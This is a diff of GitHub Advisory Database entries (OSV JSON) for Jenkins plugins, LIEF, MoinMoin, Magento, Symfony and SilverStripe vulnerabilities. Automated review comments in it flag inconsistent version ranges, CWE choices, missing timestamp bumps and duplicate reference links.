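Review bot: The three upper ranges of GHSA-wjpc-gjf7-9938 use two-component lower bounds, `"introduced": "4.2"`, `"4.3"` and `"4.4"`, while GHSA-p78x-93mq-qwqh and GHSA-2wgg-c8xc-7gg3 in this same commit spell the same TYPO3 branches as `"4.4.0"`, `"4.1.0"` and `"4.2.0"`. Composer normalizes both forms to the same value, but a consumer that compares components literally may order `4.2` against `4.2.0` differently, and the mixed style makes the database harder to search; `"introduced": "4.2.0"`, `"4.3.0"` and `"4.4.0"` would match the siblings. This hunk begins on the previous line.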
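Review bot: Two references are added to GHSA-x752-qjv4-c4hc, but no hunk within this file's diff touches the top-level `modified` timestamp, whereas GHSA-22pv-7v9j-hqxp on this same line bumps `"modified"` to `"2024-02-08T19:46:34Z"` alongside its new content. OSV consumers and mirrors use `modified` to decide whether to re-fetch an entry, so a reference-only change without a bump is invisible to them. The same pattern recurs in GHSA-298q-wv2h-v5vw, GHSA-29mr-gr4c-vf9c, GHSA-2cg3-w597-rjfv, GHSA-2crc-5vq6-386r, GHSA-2fhr-f6q6-c4p2 and GHSA-2pw2-qpcp-m47x; if the exporter deliberately leaves `modified` untouched for reference additions, that policy deserves a sentence in the repository documentation. The added `"type": "ADVISORY"` entry for `https://github.com/advisories/GHSA-x752-qjv4-c4hc` is the advisory's own page, which is fine if self-references are the convention but otherwise only restates `id`.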
@@ -90,6 +90,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.24" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1.0" + }, + { + "fixed": "2.1.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.2.0" + }, + { + "fixed": "2.2.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.3" + } + ] + } + ] } ], "references": [ @@ -141,10 +217,22 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/86374" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2013-4752.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-4752.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-releases-symfony-2-0-24-2-1-12-2-2-5-and-2-3-3-released" + }, { "type": "WEB", "url": "https://web.archive.org/web/20130901060826/http://www.securityfocus.com/bid/61715" diff --git a/advisories/github-reviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json b/advisories/github-reviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json new file mode 100644 index 0000000000000..f992b432460c3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-22x7-vwh9-5w4g", + "modified": "2024-02-01T21:22:04Z", + "published": "2022-05-24T19:15:12Z", + "aliases": [ + "CVE-2021-32297" + ], + "summary": "LIEF heap-buffer-overflow", + "details": "An issue was discovered in LIEF through 0.11.0. A heap-buffer-overflow exists in the function main located in `pe_reader.c`. It allows an attacker to cause code Execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "lief" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32297" + }, + { + "type": "WEB", + "url": "https://github.com/lief-project/LIEF/issues/449" + }, + { + "type": "WEB", + "url": "https://github.com/lief-project/LIEF/commit/19e06755e8ce1ecf136360a5c36cded3701ac253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:22:04Z", + "nvd_published_at": "2021-09-20T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json b/advisories/github-reviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json new file mode 100644 index 0000000000000..86d704e4eb49d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json 
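Review bot: The range `"introduced": "0"` / `"fixed": "0.11.0"` excludes 0.11.0, but the details text says the issue affects LIEF "through 0.11.0", i.e. 0.11.0 inclusive, so the range under-reports exactly the release the report names. Either `"last_affected": "0.11.0"` or a `fixed` event naming the release that actually contains the referenced commit would make the two agree; which is correct should be confirmed from the linked issue and commit. Also, `details` places the overflow in the function `main` of `pe_reader.c`, which reads like an example program rather than the `lief` PyPI module itself; a sentence on whether installs of the wheel are exposed would help consumers triage.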
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23r7-hf6g-qqqg", + "modified": "2024-01-30T22:29:39Z", + "published": "2022-05-13T01:25:41Z", + "aliases": [ + "CVE-2019-1003090" + ], + "summary": "CSRF vulnerability in Jenkins SOASTA CloudTest Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.soasta.jenkins:cloudtest" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.25" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003090" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:29:39Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json b/advisories/github-reviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json new file mode 100644 index 0000000000000..a87a8f00c815f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json 
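Review bot: The only range ends with `"last_affected": "2.25"` and no `fixed` event, so any later release of `com.soasta.jenkins:cloudtest` will be reported as unaffected even though nothing in the entry says a fix shipped. If the plugin was never fixed, the entry should say so, for example with an open-ended range (an `introduced` event only) or a `database_specific` note, so matchers do not silently clear later versions; if it was fixed, `fixed` is the event to use. The same shape appears in GHSA-2r46-cwgm-vvjx with `"last_affected": "2.4.6"`.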
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23xr-9xxr-vg3c", + "modified": "2024-01-30T22:12:36Z", + "published": "2022-05-13T01:48:37Z", + "aliases": [ + "CVE-2018-1000420" + ], + "summary": "Improper authorization vulnerability in Jenkins Mesos Plugin", + "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mesos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.17.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000420" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(1)" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:12:36Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json b/advisories/github-reviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json new file mode 100644 index 0000000000000..a3044d7592fa2 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-268v-2qq7-84pf", + "modified": "2024-01-30T21:58:23Z", + "published": "2022-05-13T01:18:20Z", + "aliases": [ + "CVE-2017-1000243" + ], + "summary": "Missing permission check in Jenkins Favorite Plugin", + "details": "Jenkins Favorite Plugin up to and including 2.1.0 does not perform permission checks when changing favorite status, allowing any user to set any other user's favorites", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:favorite" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000243" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/favorite-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-06-06/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/101946" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:58:23Z", + "nvd_published_at": "2017-11-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json b/advisories/github-reviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json new file mode 100644 index 0000000000000..e0800f16124c4 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json 
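Review bot: The `affected` entry has `"fixed": "2.3.0"` while the details text says versions up to and including 2.1.0 are vulnerable, leaving 2.1.1 through 2.2.x implicitly flagged; the sibling entries in this commit (GHSA-23xr-9xxr-vg3c, GHSA-26hw-262c-g9gc, GHSA-278v-j3cr-jv2x) record exactly this kind of gap with a `database_specific` block on the affected entry. For consistency add `"database_specific": { "last_known_affected_version_range": "<= 2.1.0" }` after `ranges`, or confirm that no release exists between 2.1.0 and 2.3.0.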
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-26hw-262c-g9gc", + "modified": "2024-01-30T22:37:12Z", + "published": "2022-05-14T03:13:12Z", + "aliases": [ + "CVE-2018-1000190" + ], + "summary": "Exposure of sensitive information vulnerability in Jenkins Black Duck Hub Plugin", + "details": "A exposure of sensitive information vulnerability exists in Jenkins Black Duck Hub Plugin 4.0.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.blackducksoftware.integration:blackduck-hub" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000190" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-865" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:37:12Z", + "nvd_published_at": "2018-06-05T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json b/advisories/github-reviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json new file mode 100644 index 0000000000000..0bcb8eae4ac94 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json 
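Review bot: `details` opens with `A exposure of sensitive information vulnerability`, an article error carried over from the upstream text; since the summary already reads `Exposure of sensitive information vulnerability in Jenkins Black Duck Hub Plugin`, the details could start `An exposure of sensitive information vulnerability exists …`. The rest of the entry is internally consistent: the `<= 4.0.0` last-known range matches "4.0.0 and older" and the C:H vector matches the credential-capture description.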
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-278v-j3cr-jv2x", + "modified": "2024-01-30T22:18:53Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003020" + ], + "summary": "Jenkins Kanboard Plugin vulnerable to Server-side request forgery (SSRF)", + "details": "A server-side request forgery vulnerability exists in Jenkins Kanboard Plugin 1.5.10 and earlier in KanboardGlobalConfiguration.java that allows attackers with Overall/Read permission to submit a GET request to an attacker-specified URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:kanboard" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.11" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5.10" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003020" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-818" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:18:53Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json b/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json index 14e988035294a..7be00aefcd98d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json +++ b/advisories/github-reviewed/2022/05/GHSA-298q-wv2h-v5vw/GHSA-298q-wv2h-v5vw.json 
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8142"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8142.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json b/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json
index f4b4304a175a9..534830a7bef9a 100644
--- a/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json
+++ b/advisories/github-reviewed/2022/05/GHSA-29mr-gr4c-vf9c/GHSA-29mr-gr4c-vf9c.json
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8115"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8115.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json b/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json
index 45dc6fa8ba89a..5d1c2a4636e36 100644
--- a/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json
+++ b/advisories/github-reviewed/2022/05/GHSA-2cg3-w597-rjfv/GHSA-2cg3-w597-rjfv.json
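Review bot: The added `https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update` sits next to the existing `https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update`, which archives that very URL; presumably the archive link was recorded because the live page stopped resolving, so the new entry duplicates the reference and may be a dead link. Keep one, or confirm the live page resolves again before adding it. The same pair is added in GHSA-29mr-gr4c-vf9c on this line, in GHSA-2cg3-w597-rjfv and GHSA-2crc-5vq6-386r, and GHSA-2fhr-f6q6-c4p2 does the same for the `…security-update-13` page.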
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8107"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8107.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json b/advisories/github-reviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json
new file mode 100644
index 0000000000000..7e92ee1cf6cee
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cm5-f78c-h2c8", + "modified": "2024-01-30T22:19:19Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2652" + ], + "summary": "Missing permission checks in Jenkins Distributed Fork Plugin", + "details": "It was found that there were no permission checks performed in the Distributed Fork plugin before and including 1.5.0 for Jenkins that provides the dist-fork CLI command beyond the basic check for Overall/Read permission, allowing anyone with that permission to run arbitrary shell commands on all connected nodes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:distfork" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2652" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96980" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:19:19Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json b/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json index 24de8de6b1f43..d78a911a82b1c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json +++ b/advisories/github-reviewed/2022/05/GHSA-2crc-5vq6-386r/GHSA-2crc-5vq6-386r.json 
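Review bot: `cwe_ids` is `CWE-287` (improper authentication), but the details describe a missing authorization check — a user who is already authenticated with Overall/Read can reach the `dist-fork` CLI command — and the sibling "missing permission check" entries in this commit (GHSA-268v-2qq7-84pf, GHSA-2r46-cwgm-vvjx) use `CWE-862`. Unless the upstream advisory classifies it as an authentication flaw, `"CWE-862"` would be the consistent choice. The `<= 1.5.0` last-known range does agree with "before and including 1.5.0" in the details.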
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8111"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8111.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json b/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json
index 77b333cc04797..1c7e53a842e83 100644
--- a/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json
+++ b/advisories/github-reviewed/2022/05/GHSA-2fhr-f6q6-c4p2/GHSA-2fhr-f6q6-c4p2.json
@@ -78,10 +78,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7950"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7950.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13"
diff --git a/advisories/github-reviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json b/advisories/github-reviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json
new file mode 100644
index 0000000000000..c21bb830ef65f
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json
@@ -0,0 +1,121 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j76-26qq-7rvv", + "modified": "2024-02-08T15:43:48Z", + "published": "2022-05-17T05:49:23Z", + "aliases": [ + "CVE-2010-2969" + ], + "summary": "MoinMoin cross-site scripting (XSS) vulnerability", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, and 1.9.x before 1.9.3, allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/LikePages.py, (2) action/chart.py, and (3) action/userprofile.py, a similar issue to CVE-2010-2487.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "moin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.7.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "moin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2969" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moinwiki/moin" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140801154518/http://secunia.com/advisories/40836" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228150629/http://www.securityfocus.com/bid/40549" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.7/rev/37306fba2189" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" + }, + { + "type": 
"WEB", + "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinRelease1.9" + }, + { + "type": "WEB", + "url": "http://moinmo.in/SecurityFixes" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2083" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:43:48Z", + "nvd_published_at": "2010-08-05T13:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json b/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json index 7facc0fb146c4..1f49d359b482e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json +++ b/advisories/github-reviewed/2022/05/GHSA-2pw2-qpcp-m47x/GHSA-2pw2-qpcp-m47x.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.7.5" + } + ] + } + ] } ], "references": [ @@ -40,6 +59,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9311" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2020-9311.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-cms" @@ -47,6 +70,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2020-9311" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2020-9311/" } ], "database_specific": { 
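Review bot: The two ranges of GHSA-2j76-26qq-7rvv cover `0` to `1.7.3` (`last_affected`) and `1.9.0` to `1.9.3` (`fixed`), so every 1.8.x release of `moin` is treated as unaffected; that mirrors the wording "1.7.3 and earlier, and 1.9.x before 1.9.3" literally, but the referenced fix commits are on the 1.7 and 1.9 branches only, which says nothing about whether 1.8 was patched or simply out of support. A curator should confirm 1.8.x before publishing, since an unlisted-but-vulnerable branch under-reports. Separately, `"severity"` is an empty array while `database_specific.severity` says `MODERATE`; the same pattern appears in GHSA-2q2r-xgj5-h3hm and GHSA-2wgg-c8xc-7gg3, and a note on how the textual rating was derived without a vector would help consumers. This hunk begins on the previous line.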
